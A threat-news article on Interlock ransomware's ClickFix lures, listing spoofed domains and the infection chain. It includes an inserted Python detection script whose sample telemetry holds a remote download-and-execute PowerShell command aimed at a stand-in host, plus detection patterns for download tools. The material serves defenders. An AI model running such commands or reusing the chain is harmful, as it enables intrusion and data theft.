
Ransomware Gang ‘Interlock’ Embraces Sneaky ClickFix Attacks to Hijack Corporate Systems


The Interlock ransomware gang has adopted a cunning new trick that’s catching victims off guard: impersonating IT tools to push malicious commands through something known as a ClickFix attack.

Researchers are sounding the alarm as these attacks steadily rise. The gang has now been confirmed to be using these lures to deploy their data-encrypting malware across both FreeBSD and Windows networks.

From Copy-Paste to Compromise

It starts innocently enough—an IT staffer sees a CAPTCHA screen or a tool verification page. It looks official. The next thing they know, a malicious PowerShell command has been copied to their clipboard.

Once that command is run? It’s game over.

The Interlock crew has been linked to at least four malicious URLs so far, each spoofing a legitimate tool or service:

  • microsoft-msteams[.]com/additional-check.html

  • microstteams[.]com/additional-check.html

  • ecologilives[.]com/additional-check.html

  • advanceipscaner[.]com/additional-check.html

Only one of them actually drops the infected installer, and it’s cleverly disguised as Advanced IP Scanner—a tool commonly used in IT departments.

[Screenshot: fake Advanced IP Scanner page used in the malware attack]

What Happens Behind the Scenes

The moment that PowerShell command is executed, it downloads a 36 MB file that acts as a two-faced payload.

On one hand, it installs what looks like a real version of Advanced IP Scanner. On the other, it runs a stealthy script buried within.

That hidden script? It gets right to work.

  • Registers a Run key for persistence

  • Grabs your OS version, running tasks, user privilege level

  • Scans available drives and running processes

  • Sends all that data back to a command-and-control server

There’s no pop-up, no red flags—just a browser tab showing the real tool’s website to throw off suspicion.

Payloads Get Personal

Different machines get different malware. Sekoia’s threat analysts noted several payloads coming from Interlock’s servers.

Some of the most commonly deployed ones include:

  • LummaStealer – A notorious information stealer

  • BerserkStealer – Another tool used to hoover up credentials

  • Keyloggers – Your typing? Tracked

  • Interlock RAT – A flexible trojan capable of doing everything from running shell commands to dropping malicious DLLs

This isn’t one-size-fits-all malware. It’s dynamic and adaptable. Whatever the machine lacks, the RAT fills in.

Lateral Moves and Final Hits

Once the RAT takes hold, things escalate. Interlock doesn’t just sit back—they move laterally through corporate networks.

RDP, PuTTY, AnyDesk, and LogMeIn have all been spotted in their toolkit. They hunt for credentials, map the environment, and quietly exfiltrate sensitive files before locking anything down.

Sometimes, the ransomware doesn’t even run right away.

Instead, it’s set to run at 8 PM daily as a scheduled task.

The task also filters by file extension, so it skips files that have already been encrypted. That’s not a bug; the scheduled task is a fallback, making sure the encryption still happens even if something went wrong earlier.
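A defender-side illustration of the chain described in the two passages above (the hidden script’s Run-key persistence, reconnaissance and beaconing after a pasted PowerShell command, and the daily scheduled task used as a fallback), added here as an example and not code from the article or from Sekoia’s research. It is a small Python triage script that runs three behaviour rules over constructed Sysmon-style event records and escalates hosts where more than one stage of the chain is seen. The event shape, field names, the lure domain (lure.invalid), the sample SID and the rule thresholds are all assumptions made for the example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int   # assumed Sysmon/Security IDs: 1 = process create, 13 = registry set, 4698 = task created
    host: str
    fields: dict


# Parents that indicate a user typed or pasted the command interactively: the Win+R Run box
# and Explorer spawn under explorer.exe; browsers are listed for in-page prompts (assumption).
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# PowerShell command-line cues for fetching remote content (real cmdlet names and aliases).
DOWNLOAD_CUE = re.compile(
    r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b")
# Any value written under a Run or RunOnce key, the persistence the article describes.
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run(Once)?\\")

# Constructed sample telemetry (not captured from a real incident).
SAMPLE_EVENTS = [
    Event(1, "ws-17", {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "parent_image": r"C:\Windows\explorer.exe",
                       "command_line": "powershell -w hidden -c \"iwr http://lure.invalid/additional-check.html | iex\""}),
    Event(13, "ws-17", {"target_object": r"HKU\S-1-5-21-EXAMPLE\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
                        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}),
    Event(4698, "ws-17", {"task_name": r"\Updater", "trigger": "Daily", "start_time": "20:00:00"}),
    # Benign: a service-launched maintenance script, no interactive parent, no download cue.
    Event(1, "ws-22", {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "parent_image": r"C:\Windows\System32\svchost.exe",
                       "command_line": r"powershell -File C:\scripts\backup.ps1"}),
]


def _basename(path: str) -> str:
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_launch(ev: Event) -> bool:
    """Rule 1: PowerShell started from an interactive parent with a download cue in its command line."""
    if ev.event_id != 1:
        return False
    f = ev.fields
    return (_basename(f.get("image", "")) in {"powershell.exe", "pwsh.exe"}
            and _basename(f.get("parent_image", "")) in INTERACTIVE_PARENTS
            and bool(DOWNLOAD_CUE.search(f.get("command_line", ""))))


def run_key_persistence(ev: Event) -> bool:
    """Rule 2: a registry value set under HK*\\...\\CurrentVersion\\Run or RunOnce."""
    return ev.event_id == 13 and bool(RUN_KEY.search(ev.fields.get("target_object", "")))


def daily_scheduled_task(ev: Event) -> bool:
    """Rule 3: a newly created task with a daily trigger. The article reports an 8 PM daily
    task; filtering on the exact hour would be brittle, so the trigger type is what is matched."""
    return ev.event_id == 4698 and ev.fields.get("trigger", "").lower() == "daily"


RULES = [("clickfix_launch", clickfix_launch),
         ("run_key_persistence", run_key_persistence),
         ("daily_scheduled_task", daily_scheduled_task)]


def triage(events) -> dict:
    """Map each host to the ordered list of rule names that fired on its events."""
    findings = defaultdict(list)
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                findings[ev.host].append(name)
    return dict(findings)


def hosts_to_escalate(events, min_findings: int = 2) -> list:
    """Hosts where at least two distinct stages of the chain were seen.
    A single rule firing is a lead for an analyst, not a verdict."""
    return sorted(h for h, f in triage(events).items() if len(set(f)) >= min_findings)


if __name__ == "__main__":
    for host, fired in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(fired))
    print("escalate:", hosts_to_escalate(SAMPLE_EVENTS))
```

The correlation step matters more than any single rule: an interactive PowerShell launch with a download cue is common enough on admin workstations to be noisy on its own, but the same host also gaining a Run-key entry and a new daily task within one window is the shape of the chain the article describes.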

The Note That Hits Where It Hurts

The ransom note isn’t just a list of demands anymore.

Interlock’s latest version focuses less on technical threats and more on legal and regulatory nightmares. Think GDPR fines, SEC violations, shareholder panic.

It’s a psychological sledgehammer—pay up, or deal with lawsuits, lost trust, and maybe a public scandal.

The message has changed.

ClickFix Isn’t Just Interlock’s Toy Anymore

This isn’t just an Interlock issue. Other cybercriminal groups are jumping on the ClickFix bandwagon. Even the infamous Lazarus group from North Korea has joined the trend.

Just last month, Lazarus used the same trick targeting job seekers in crypto.

It’s working because it doesn’t feel like a scam—until it’s too late.

The ClickFix approach feels casual. There’s no scary pop-up. No noisy alert. Just a “verify here” prompt and a quick copy-paste.

By the time the victim realizes what happened, their files are locked, their credentials are stolen, and attackers are already digging through their network.

Table: Timeline of Interlock’s Known Attack Evolution

Time Period    Tactic Used                                     Goal
Sep 2024       Launch: fake browser/VPN updates                Malware delivery
Jan 2025       ClickFix via spoofed IT tool websites           Initial access
Ongoing        RAT deployment + credential theft               Lateral movement
Final stage    Ransomware scheduled task, data exfiltration    Encryption and extortion

Hayden Patrick is a writer who specializes in entertainment and sports. He is passionate about movies, music, games, and sports, and he shares his opinions and reviews on these topics. He also writes on other topics when there is no one available, such as health, education, business, and more.
